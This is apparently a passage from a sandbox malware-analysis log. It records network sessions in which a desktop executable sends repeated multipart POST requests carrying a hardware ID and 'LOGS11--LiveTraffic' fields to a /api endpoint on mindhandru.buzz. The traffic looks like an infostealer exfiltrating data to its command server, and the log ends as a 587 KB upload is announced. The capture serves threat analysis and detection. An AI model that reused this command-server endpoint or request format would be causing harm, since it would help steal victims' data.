2024-12-26 11:41:19 UTC	1369	IN	Data Raw: 50 6f 78 56 61 6f 64 77 66 51 54 4f 48 50 4e 76 71 2b 5a 43 61 6c 4b 42 70 43 65 52 4a 70 79 33 71 4d 56 74 4b 33 77 6a 4c 48 54 61 2f 52 47 71 4a 38 51 49 63 4a 6f 6f 5a 31 2f 4b 77 74 63 75 6f 4f 45 31 74 2f 54 69 47 4b 5a 4d 6c 43 6e 72 44 44 66 35 55 4d 70 74 59 54 70 58 5a 45 68 77 2f 77 79 54 50 70 74 47 41 67 75 43 55 56 56 58 34 59 64 73 6c 39 67 56 44 53 70 63 59 2f 7a 6b 66 6d 6b 6c 61 6f 59 77 66 51 54 4d 48 66 49 2f 47 7a 59 54 79 68 4c 68 31 47 66 67 55 37 68 44 75 57 58 4d 2f 33 6c 79 6e 64 57 36 48 44 57 4c 59 37 51 49 52 4d 75 6f 67 7a 38 72 4a 71 4c 4b 51 39 47 31 5a 38 47 6e 4c 44 66 34 39 59 33 72 50 4c 4f 4d 68 50 71 74 63 52 72 48 52 44 67 51 4c 72 78 33 57 31 39 47 6f 79 36 6e 64 65 63 57 67 57 64 38 63 37 6d 42 58 48 39 38 67 7a 6a Data Ascii: PoxVaodwfQTOHPNvq+ZCalKBpCeRJpy3qMVtK3wjLHTa/RGqJ8QIcJooZ1/KwtcuoOE1t/TiGKZMlCnrDDf5UMptYTpXZEhw/wyTPptGAguCUVVX4Ydsl9gVDSpcY/zkfmklaoYwfQTMHfI/GzYTyhLh1GfgU7hDuWXM/3lyndW6HDWLY7QIRMuogz8rJqLKQ9G1Z8GnLDf49Y3rPLOMhPqtcRrHRDgQLrx3W19Goy6ndecWgWd8c7mBXH98gzj
2024-12-26 11:41:19 UTC	270	IN	Data Raw: 4f 37 31 74 4d 6e 67 6e 6c 33 6e 66 4f 74 32 4d 6b 72 54 6c 65 54 30 78 62 4f 38 56 68 78 77 50 6e 72 6f 38 34 77 51 7a 2b 6e 41 4f 6f 65 30 43 53 47 75 58 45 4a 50 43 35 59 51 69 6c 4b 41 68 54 66 42 5a 71 77 7a 65 4d 56 70 37 35 6a 7a 6a 56 44 50 36 63 4f 61 68 74 52 4b 63 50 38 38 46 31 74 66 52 71 50 4f 70 33 58 6d 34 7a 42 33 6a 61 65 49 68 4b 34 50 65 58 4a 76 4d 4d 72 63 6f 52 76 33 68 52 67 77 48 75 32 51 75 37 37 44 6c 34 2b 48 31 4d 41 6d 78 56 5a 50 55 31 78 31 71 65 37 2f 59 6d 6a 56 72 6d 68 45 54 68 4f 31 58 49 56 4b 4b 50 4e 75 6d 6d 61 79 6d 38 4c 46 6c 75 54 54 4a 74 77 48 79 58 58 4d 6d 34 6a 33 47 4e 51 2b 61 45 4c 2b 39 79 51 4a 4d 64 39 4d 55 6c 2f 50 52 53 5a 4f 6f 33 58 67 67 7a 49 48 6a 45 64 59 42 4e 7a 2f 72 6f 4b 63 64 4c 74 74 Data Ascii: O71tMngnl3nfOt2MkrTleT0xbO8VhxwPnro84wQz+nAOoe0CSGuXEJPC5YQilKAhTfBZqwzeMVp75jzjVDP6cOahtRKcP88F1tfRqPOp3Xm4zB3jaeIhK4PeXJvMMrcoRv3hRgwHu2Qu77Dl4+H1MAmxVZPU1x1qe7/YmjVrmhEThO1XIVKKPNummaym8LFluTTJtwHyXXMm4j3GNQ+aEL+9yQJMd9MUl/PRSZOo3XggzIHjEdYBNz/roKcdLtt
2024-12-26 11:41:19 UTC	1369	IN	Data Raw: 32 63 36 35 0d 0a 31 39 47 6b 37 36 6e 64 4f 41 69 68 41 4b 4a 30 72 31 55 53 51 72 6f 38 70 6a 52 54 30 6b 6c 61 39 4f 78 2f 49 53 2b 48 61 4a 2f 32 33 65 79 6e 74 45 53 42 33 61 52 68 39 33 57 71 35 5a 64 6d 74 77 6a 6e 61 58 65 72 4a 46 61 46 31 51 4a 35 4d 72 49 67 36 75 2b 78 55 61 75 4a 76 49 52 34 7a 44 54 75 53 4f 37 4a 59 30 4c 6e 49 4b 64 77 42 67 63 59 62 71 57 78 57 79 45 4b 69 7a 6e 57 6a 35 43 4e 71 72 6a 35 65 43 43 4e 48 49 4a 38 6f 30 41 75 4d 71 49 45 6d 6a 56 72 6d 68 45 54 68 4f 31 58 49 56 4b 4b 50 4e 75 6d 6d 61 79 6d 38 4c 46 6c 75 54 54 74 38 7a 48 36 41 53 35 79 5a 78 43 76 4b 44 4f 69 63 47 65 38 6a 66 73 68 45 6f 76 64 37 75 36 77 74 63 75 6f 61 48 56 35 39 45 6d 33 62 4e 71 6c 63 32 4c 4c 49 4c 34 39 69 72 63 67 52 37 7a 55 48 Data Ascii: 2c6519Gk76ndOAihAKJ0r1USQro8pjRT0kla9Ox/IS+HaJ/23eyntESB3aRh93Wq5ZdmtwjnaXerJFaF1QJ5MrIg6u+xUauJvIR4zDTuSO7JY0LnIKdwBgcYbqWxWyEKiznWj5CNqrj5eCCNHIJ8o0AuMqIEmjVrmhEThO1XIVKKPNummaym8LFluTTt8zH6AS5yZxCvKDOicGe8jfshEovd7u6wtcuoaHV59Em3bNqlc2LLIL49ircgR7zUH
2024-12-26 11:41:19 UTC	1369	IN	Data Raw: 68 79 2b 4b 5a 2f 4c 4b 6b 35 48 52 64 4e 4b 31 7a 45 66 49 5a 4e 7a 71 44 41 63 4f 4e 36 68 2b 49 6f 75 6e 68 4a 68 67 76 30 32 58 57 31 39 47 4a 71 38 68 5a 65 47 44 4d 71 4e 59 70 6a 78 77 4f 65 67 73 77 78 77 30 75 77 7a 56 75 49 64 55 43 4a 47 76 4c 66 4f 72 53 61 57 77 76 71 59 56 35 57 4d 30 30 70 68 44 75 44 53 70 37 76 6e 32 32 57 47 66 57 4c 52 76 31 6b 43 5a 46 4d 39 49 68 74 71 66 6f 74 4f 4f 70 33 58 68 64 77 42 32 6e 4d 65 4a 46 59 6d 59 6e 78 47 4d 4e 4c 70 38 6f 47 6f 6e 64 6d 69 78 33 6f 39 67 76 75 74 32 4d 6b 72 54 6b 50 45 44 31 56 64 49 6f 6a 76 68 75 57 39 2f 42 78 6a 56 54 6d 68 46 61 61 65 45 6d 47 43 2f 54 5a 65 4e 79 36 61 69 75 38 50 78 4e 63 55 68 5a 71 77 44 76 4a 47 39 6a 33 6c 32 32 44 44 4b 4c 4e 56 76 63 72 46 64 4e 5a 73 Data Ascii: hy+KZ/LKk5HRdNK1zEfIZNzqDAcON6h+IounhJhgv02XW19GJq8hZeGDMqNYpjxwOegswxw0uwzVuIdUCJGvLfOrSaWwvqYV5WM00phDuDSp7vn22WGfWLRv1kCZFM9IhtqfotOOp3XhdwB2nMeJFYmYnxGMNLp8oGondmix3o9gvut2MkrTkPED1VdIojvhuW9/BxjVTmhFaaeEmGC/TZeNy6aiu8PxNcUhZqwDvJG9j3l22DDKLNVvcrFdNZs

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49732	104.21.11.101	443	6844	C:\Users\user\Desktop\TTsfmr1RWm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:41:21 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=GBLOCF4GKS9YBFRQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12853 Host: mindhandru.buzz
2024-12-26 11:41:21 UTC	12853	OUT	Data Raw: 2d 2d 47 42 4c 4f 43 46 34 47 4b 53 39 59 42 46 52 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 43 32 38 41 33 37 33 34 39 42 31 44 46 42 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 47 42 4c 4f 43 46 34 47 4b 53 39 59 42 46 52 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 42 4c 4f 43 46 34 47 4b 53 39 59 42 46 52 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 Data Ascii: --GBLOCF4GKS9YBFRQContent-Disposition: form-data; name="hwid"4C28A37349B1DFB7BEBA0C6A975F1733--GBLOCF4GKS9YBFRQContent-Disposition: form-data; name="pid"2--GBLOCF4GKS9YBFRQContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
2024-12-26 11:41:22 UTC	1138	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:41:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lecta620v833uspi1pm1mi45t3; expires=Mon, 21 Apr 2025 05:28:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AInN0u%2FkcSsTZ8C5Bug5azF%2BFpZiJ1H%2BPkkKThZ5pGsGwMPwJg562R47J0QlWwtran0%2BB0o3%2Ft%2FY4%2BlervhRx0Ug2e03IQ477QVbAaSyXX1u%2BbpRQ5x4lt1HLND6xpsP1YQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80cd21af048c9c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1801&min_rtt=1793&rtt_var=689&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13790&delivery_rate=1569048&cwnd=196&unsent_bytes=0&cid=6bf0594c4ae78b03&ts=1048&x=0"
2024-12-26 11:41:22 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 11:41:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.6	49731	20.198.119.84	443

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:41:22 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 68 6b 31 6b 39 63 6c 75 56 30 57 56 36 6b 44 37 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 64 65 64 38 65 66 36 61 36 33 61 32 37 65 35 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: hk1k9cluV0WV6kD7.1Context: fded8ef6a63a27e5
2024-12-26 11:41:22 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-26 11:41:22 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 68 6b 31 6b 39 63 6c 75 56 30 57 56 36 6b 44 37 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 64 65 64 38 65 66 36 61 36 33 61 32 37 65 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 46 55 57 56 70 7a 72 4f 35 39 6c 55 66 64 71 50 31 70 6f 6d 34 50 6a 38 37 44 61 47 49 6a 49 53 62 4e 68 46 6a 6a 76 41 31 6b 70 5a 4c 45 52 71 77 50 46 36 56 31 58 65 55 30 6f 5a 78 79 37 66 34 32 68 2f 35 69 59 38 79 70 42 38 44 37 64 75 2f 55 64 36 48 30 69 37 67 49 6a 34 55 77 59 72 6d 61 52 6b 46 2f 65 70 43 38 52 78 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: hk1k9cluV0WV6kD7.2Context: fded8ef6a63a27e5<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAVFUWVpzrO59lUfdqP1pom4Pj87DaGIjISbNhFjjvA1kpZLERqwPF6V1XeU0oZxy7f42h/5iY8ypB8D7du/Ud6H0i7gIj4UwYrmaRkF/epC8Rx
2024-12-26 11:41:22 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 68 6b 31 6b 39 63 6c 75 56 30 57 56 36 6b 44 37 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 64 65 64 38 65 66 36 61 36 33 61 32 37 65 35 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: hk1k9cluV0WV6kD7.3Context: fded8ef6a63a27e5<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-26 11:41:22 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-26 11:41:22 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 65 73 51 46 73 46 6b 76 6f 45 75 5a 51 39 52 41 69 6a 53 65 6c 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: esQFsFkvoEuZQ9RAijSelA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49743	104.21.11.101	443	6844	C:\Users\user\Desktop\TTsfmr1RWm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:41:23 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=1Y9XGFOL5X2AS9A2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15099 Host: mindhandru.buzz
2024-12-26 11:41:23 UTC	15099	OUT	Data Raw: 2d 2d 31 59 39 58 47 46 4f 4c 35 58 32 41 53 39 41 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 43 32 38 41 33 37 33 34 39 42 31 44 46 42 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 31 59 39 58 47 46 4f 4c 35 58 32 41 53 39 41 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 59 39 58 47 46 4f 4c 35 58 32 41 53 39 41 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 Data Ascii: --1Y9XGFOL5X2AS9A2Content-Disposition: form-data; name="hwid"4C28A37349B1DFB7BEBA0C6A975F1733--1Y9XGFOL5X2AS9A2Content-Disposition: form-data; name="pid"2--1Y9XGFOL5X2AS9A2Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic
2024-12-26 11:41:24 UTC	1123	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:41:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=g0drl04i4s3etssvo547naa3e8; expires=Mon, 21 Apr 2025 05:28:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=83BFZh0CKlQ58cdz4dI%2BkIn26smc4AQXCcBFueuT3xb3OIxVLD6T1cms298ZKASDKtQ3ExNeGJ98MDCkMOHIqssnP74OViaxL71dl4yBt9uXEcc05e2dgCDQMGs1bujZGOs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80cd312f0b9e02-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1823&min_rtt=1810&rtt_var=706&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2836&recv_bytes=16036&delivery_rate=1521625&cwnd=244&unsent_bytes=0&cid=c7cdeda83f046fdb&ts=996&x=0"
2024-12-26 11:41:24 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 11:41:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49749	104.21.11.101	443	6844	C:\Users\user\Desktop\TTsfmr1RWm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:41:26 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=DFTC6MBZXIQ0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19933 Host: mindhandru.buzz
2024-12-26 11:41:26 UTC	15331	OUT	Data Raw: 2d 2d 44 46 54 43 36 4d 42 5a 58 49 51 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 43 32 38 41 33 37 33 34 39 42 31 44 46 42 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 44 46 54 43 36 4d 42 5a 58 49 51 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 44 46 54 43 36 4d 42 5a 58 49 51 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 44 46 54 43 36 4d 42 5a Data Ascii: --DFTC6MBZXIQ0Content-Disposition: form-data; name="hwid"4C28A37349B1DFB7BEBA0C6A975F1733--DFTC6MBZXIQ0Content-Disposition: form-data; name="pid"3--DFTC6MBZXIQ0Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--DFTC6MBZ
2024-12-26 11:41:26 UTC	4602	OUT	Data Raw: 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: +?2+?2+?o?Mp5p_oI
2024-12-26 11:41:27 UTC	1127	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:41:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gsgvmeciiuv8lmpirq5nvg1qvi; expires=Mon, 21 Apr 2025 05:28:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V3Cgqjbb6FTPN62by7nEswRZ4ya3mcWowXqmvepksQDaRSrl0zkNGmE%2FbgetFWAkXxnm%2B1alQkjgoMzLGFtyNGdYXgOLYsMoWKD6eWrlqPdvccf9im%2Bi65EKmZHpyKrYxKc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80cd40ec8642d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2106&min_rtt=2101&rtt_var=798&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2836&recv_bytes=20888&delivery_rate=1361940&cwnd=227&unsent_bytes=0&cid=703585acddbcd54f&ts=904&x=0"
2024-12-26 11:41:27 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 11:41:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49755	104.21.11.101	443	6844	C:\Users\user\Desktop\TTsfmr1RWm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:41:29 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=496THN0QOVJB63 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1210 Host: mindhandru.buzz
2024-12-26 11:41:29 UTC	1210	OUT	Data Raw: 2d 2d 34 39 36 54 48 4e 30 51 4f 56 4a 42 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 43 32 38 41 33 37 33 34 39 42 31 44 46 42 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 34 39 36 54 48 4e 30 51 4f 56 4a 42 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 39 36 54 48 4e 30 51 4f 56 4a 42 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 34 39 Data Ascii: --496THN0QOVJB63Content-Disposition: form-data; name="hwid"4C28A37349B1DFB7BEBA0C6A975F1733--496THN0QOVJB63Content-Disposition: form-data; name="pid"1--496THN0QOVJB63Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--49
2024-12-26 11:41:30 UTC	1134	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:41:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4n1i05r1vhp7a8i1ji7nt6953m; expires=Mon, 21 Apr 2025 05:28:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mxVPm9RFzdGB%2FTg84A5L2%2Bt%2FCPacG02MTbVr%2FeUuR7DCDaxWvPWm0c6JtolPtiDxdyoKfgSXiKp%2FXSs%2F%2BE4zhVf%2Bi5AIxNbXRBKCdZAV18XznedOUzFi0qXJvqSvUSMBTUQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80cd53ead98c53-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1768&min_rtt=1757&rtt_var=681&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2122&delivery_rate=1582655&cwnd=213&unsent_bytes=0&cid=b39e89389d7c1315&ts=787&x=0"
2024-12-26 11:41:30 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 11:41:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49763	104.21.11.101	443	6844	C:\Users\user\Desktop\TTsfmr1RWm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:41:31 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0TXLCFHQBT0T User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 587771 Host: mindhandru.buzz
